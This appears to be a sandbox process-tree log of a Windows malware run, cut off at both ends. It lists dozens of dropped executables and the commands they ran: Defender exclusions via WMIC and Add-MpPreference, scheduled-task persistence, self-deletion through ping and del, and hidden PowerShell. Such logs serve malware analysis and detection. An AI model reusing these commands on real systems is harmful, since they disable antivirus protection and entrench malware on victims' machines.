4⤵
PID:1652

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
2⤵
PID:5660

C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
2⤵
PID:4512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
3⤵
PID:5420

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
4⤵
PID:7212

C:\Users\Admin\AppData\Local\Temp\Files\Max.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Max.exe"
2⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\Files\jet.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jet.exe"
2⤵
PID:5064

C:\Users\Admin\AppData\Local\Temp\Files\well.exe
"C:\Users\Admin\AppData\Local\Temp\Files\well.exe"
2⤵
PID:1828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
3⤵
PID:436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff84f3f9758,0x7ff84f3f9768,0x7ff84f3f9778
4⤵
PID:6488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:2
4⤵
PID:5020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1888 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:8
4⤵
PID:6888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1924 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:8
4⤵
PID:5132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:1
4⤵
PID:412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:1
4⤵
PID:6984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:1
4⤵
PID:2676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:8
4⤵
PID:1324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:8
4⤵
PID:2752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=2352,i,15917643529396111735,18106435595484679046,131072 /prefetch:8
4⤵
PID:7436

C:\Users\Admin\AppData\Local\Temp\Files\m.exe
"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
2⤵
PID:6528

C:\Users\Admin\AppData\Local\Temp\Files\m.exe
"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
3⤵
PID:2384

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\system32\svchost.exe"
4⤵
PID:6752

C:\Users\Admin\AppData\Local\Temp\Files\un300un.exe
"C:\Users\Admin\AppData\Local\Temp\Files\un300un.exe"
2⤵
PID:7056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
PID:6780

C:\Users\Admin\Pictures\PsspCrsiHRBkDREZBXjDe7Uu.exe
"C:\Users\Admin\Pictures\PsspCrsiHRBkDREZBXjDe7Uu.exe"
4⤵
PID:5928

C:\Users\Admin\AppData\Local\Temp\u4ko.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4ko.0.exe"
5⤵
PID:6792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DHJDAFIEHI.exe"
6⤵
PID:7128

C:\Users\Admin\AppData\Local\Temp\DHJDAFIEHI.exe
"C:\Users\Admin\AppData\Local\Temp\DHJDAFIEHI.exe"
7⤵
PID:6704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DHJDAFIEHI.exe
8⤵
PID:6756

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
9⤵
- Runs ping.exe
PID:5332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6792 -s 3516
6⤵
- Program crash
PID:2928

C:\Users\Admin\AppData\Local\Temp\u4ko.1.exe
"C:\Users\Admin\AppData\Local\Temp\u4ko.1.exe"
5⤵
PID:7712

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
6⤵
PID:8072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 1584
5⤵
- Program crash
PID:8136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 1596
5⤵
- Program crash
PID:8112

C:\Users\Admin\Pictures\P9DZii693CusXaiX1fmdKApG.exe
"C:\Users\Admin\Pictures\P9DZii693CusXaiX1fmdKApG.exe"
4⤵
PID:4612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:7128

C:\Users\Admin\Pictures\P9DZii693CusXaiX1fmdKApG.exe
"C:\Users\Admin\Pictures\P9DZii693CusXaiX1fmdKApG.exe"
5⤵
PID:5528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:7912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 828
5⤵
- Program crash
PID:4500

C:\Users\Admin\Pictures\vxbmux7YQSDMwQkqgYehMzFO.exe
"C:\Users\Admin\Pictures\vxbmux7YQSDMwQkqgYehMzFO.exe"
4⤵
PID:5640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:7896

C:\Users\Admin\Pictures\vxbmux7YQSDMwQkqgYehMzFO.exe
"C:\Users\Admin\Pictures\vxbmux7YQSDMwQkqgYehMzFO.exe"
5⤵
PID:5624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:6996

C:\Users\Admin\Pictures\48giLnesKjQieVHBmS6z7ixc.exe
"C:\Users\Admin\Pictures\48giLnesKjQieVHBmS6z7ixc.exe" --silent --allusers=0
4⤵
PID:3984

C:\Users\Admin\Pictures\48giLnesKjQieVHBmS6z7ixc.exe
C:\Users\Admin\Pictures\48giLnesKjQieVHBmS6z7ixc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2b4,0x2b8,0x2bc,0x2b0,0x2c0,0x6a2fe1d0,0x6a2fe1dc,0x6a2fe1e8
5⤵
PID:988

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\48giLnesKjQieVHBmS6z7ixc.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\48giLnesKjQieVHBmS6z7ixc.exe" --version
5⤵
PID:7016

C:\Users\Admin\Pictures\48giLnesKjQieVHBmS6z7ixc.exe
"C:\Users\Admin\Pictures\48giLnesKjQieVHBmS6z7ixc.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3984 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240409103748" --session-guid=0d5658b5-90a4-4a4e-ba9d-4a27e3fe8f1a --server-tracking-blob="YzAxZjhlNTg0YjZkMGRjNjU3ODIxNTMyMzc1ZWY3MmQyZjExMTI0OTg5MGFkNzBkODc3ZDU0MzBhYmM0YWQ0OTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEyNjU5MDU5LjMwNzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMWVjY2VmNGMtODY1My00NGU1LThjYjgtZWMwZDg1YzdmOGQxIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C05000000000000
5⤵
PID:6512

C:\Users\Admin\Pictures\48giLnesKjQieVHBmS6z7ixc.exe
C:\Users\Admin\Pictures\48giLnesKjQieVHBmS6z7ixc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2b0,0x2c0,0x2c4,0x28c,0x2c8,0x6997e1d0,0x6997e1dc,0x6997e1e8
6⤵
PID:6524

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091037481\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091037481\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
5⤵
PID:3684

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091037481\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091037481\assistant\assistant_installer.exe" --version
5⤵
PID:7988

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091037481\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091037481\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x9f0040,0x9f004c,0x9f0058
6⤵
PID:1324

C:\Users\Admin\Pictures\li3XYPTMDrSKql5IlOh2fN70.exe
"C:\Users\Admin\Pictures\li3XYPTMDrSKql5IlOh2fN70.exe"
4⤵
PID:868

C:\Users\Admin\AppData\Local\Temp\7zS404.tmp\Install.exe
.\Install.exe /dQndidvBp "385118" /S
5⤵
PID:6596

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:3304

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:6384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:4976

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
PID:7476

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 10:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\VVuPVGQ.exe\" mP /vnsite_idczo 385118 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:4052

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bgNHpsssZstYPMxCCI"
6⤵
PID:1636

C:\Users\Admin\Pictures\qMVS8EHam5SQKiRZKtmeaNwX.exe
"C:\Users\Admin\Pictures\qMVS8EHam5SQKiRZKtmeaNwX.exe"
4⤵
PID:6312

C:\Users\Admin\Pictures\i3GFynMQ6qetysLZKIFv9lSQ.exe
"C:\Users\Admin\Pictures\i3GFynMQ6qetysLZKIFv9lSQ.exe"
4⤵
PID:7132

C:\Users\Admin\AppData\Local\Temp\7zS3015.tmp\Install.exe
.\Install.exe /dQndidvBp "385118" /S
5⤵
PID:8096

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:6644

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:6736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:5828

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
PID:7116

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 10:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\XcqYegK.exe\" mP /VIsite_idOHu 385118 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:7916

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bgNHpsssZstYPMxCCI"
6⤵
PID:3932

C:\Users\Admin\AppData\Local\Temp\Files\boomlumma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\boomlumma.exe"
2⤵
PID:7076

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3568

C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe
"C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"
2⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\Files\yoffens_crypted_EASY.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yoffens_crypted_EASY.exe"
2⤵
PID:3644

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
2⤵
PID:7352

C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
2⤵
PID:7608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 1292
3⤵
- Program crash
PID:1700

C:\Users\Admin\AppData\Local\Temp\Files\ISetup5.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ISetup5.exe"
2⤵
PID:7804

C:\Users\Admin\AppData\Local\Temp\u60s.0.exe
"C:\Users\Admin\AppData\Local\Temp\u60s.0.exe"
3⤵
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5952 -s 1096
4⤵
- Program crash
PID:3052

C:\Users\Admin\AppData\Local\Temp\u60s.1.exe
"C:\Users\Admin\AppData\Local\Temp\u60s.1.exe"
3⤵
PID:7308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 1532
3⤵
- Program crash
PID:6308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 968
3⤵
- Program crash
PID:4280

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1276.tmp.bat""
3⤵
PID:5452

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:7208

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
PID:7188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
PID:6164

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:412

C:\Users\Admin\AppData\Local\Temp\Files\Adobe_update.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Adobe_update.exe"
2⤵
PID:4052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 812
3⤵
- Program crash
PID:7440

C:\Users\Admin\AppData\Local\Temp\Files\Pparetcoju.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Pparetcoju.exe"
2⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
PID:5340

C:\Users\Admin\AppData\Local\Temp\Files\new1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\new1.exe"
2⤵
PID:7372

C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe"
2⤵
PID:5056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6160

C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe
"C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe"
2⤵
PID:7876

C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
"C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe"
2⤵
PID:4908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
3⤵
PID:6320

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
4⤵
- Creates scheduled task(s)
PID:6236

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
3⤵
PID:6300

C:\Users\Admin\AppData\Local\Temp\Files\Pac-Man.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Pac-Man.exe"
2⤵
PID:1332

C:\Users\Admin\AppData\Local\Temp\Files\lumma123142124.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lumma123142124.exe"
2⤵
PID:6552

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7884

C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"
2⤵
PID:5048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:676

C:\Users\Admin\AppData\Local\Temp\Files\afile.exe
"C:\Users\Admin\AppData\Local\Temp\Files\afile.exe"
2⤵
PID:7104

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7592

C:\Users\Admin\AppData\Roaming\configurationValue\newss.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\newss.exe"
4⤵
PID:5664

C:\Users\Admin\AppData\Roaming\configurationValue\traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\traffic.exe"
4⤵
PID:7484

C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
2⤵
PID:7596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
3⤵
PID:7380

C:\Windows\system32\mode.com
mode 65,10
4⤵
PID:7208

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p146312891125116171371883110193 -oextracted
4⤵
PID:6688

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
4⤵
PID:1968

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
4⤵
PID:7556

C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
4⤵
- Views/modifies file attributes
PID:8592

C:\Users\Admin\AppData\Local\Temp\Files\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\toolspub1.exe"
2⤵
PID:7608

C:\Users\Admin\AppData\Local\Temp\Files\cry.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cry.exe"
2⤵
PID:4028

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 1908
4⤵
- Program crash
PID:2376

C:\Users\Admin\AppData\Local\Temp\Files\file300un-1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file300un-1.exe"
2⤵
PID:7720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
3⤵
PID:6440

C:\Users\Admin\Pictures\TNhJ8lgmVn58Ewrm6NdQlWIe.exe
"C:\Users\Admin\Pictures\TNhJ8lgmVn58Ewrm6NdQlWIe.exe"
4⤵
PID:7236

C:\Users\Admin\AppData\Local\Temp\u5l0.0.exe
"C:\Users\Admin\AppData\Local\Temp\u5l0.0.exe"
5⤵
PID:8140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1380
6⤵
- Program crash
PID:7912

C:\Users\Admin\AppData\Local\Temp\u5l0.1.exe
"C:\Users\Admin\AppData\Local\Temp\u5l0.1.exe"
5⤵
PID:8300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 984
5⤵
- Program crash
PID:8948

C:\Users\Admin\Pictures\pmuhd84aEXnYa0wRDnMqCcT3.exe
"C:\Users\Admin\Pictures\pmuhd84aEXnYa0wRDnMqCcT3.exe"
4⤵
PID:6432

C:\Users\Admin\Pictures\JGhobI5KVonHb4p9wsVDJ3G6.exe
"C:\Users\Admin\Pictures\JGhobI5KVonHb4p9wsVDJ3G6.exe"
4⤵
PID:7720

C:\Users\Admin\Pictures\5LIqouXafPGVKMLEPJFDlXRN.exe
"C:\Users\Admin\Pictures\5LIqouXafPGVKMLEPJFDlXRN.exe"
4⤵
PID:2948

C:\Users\Admin\Pictures\pZ5VqEn4aUe5U49GuEbV9Zhu.exe
"C:\Users\Admin\Pictures\pZ5VqEn4aUe5U49GuEbV9Zhu.exe" --silent --allusers=0
4⤵
PID:6012

C:\Users\Admin\Pictures\pZ5VqEn4aUe5U49GuEbV9Zhu.exe
C:\Users\Admin\Pictures\pZ5VqEn4aUe5U49GuEbV9Zhu.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x674be1d0,0x674be1dc,0x674be1e8
5⤵
PID:7828

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pZ5VqEn4aUe5U49GuEbV9Zhu.exe
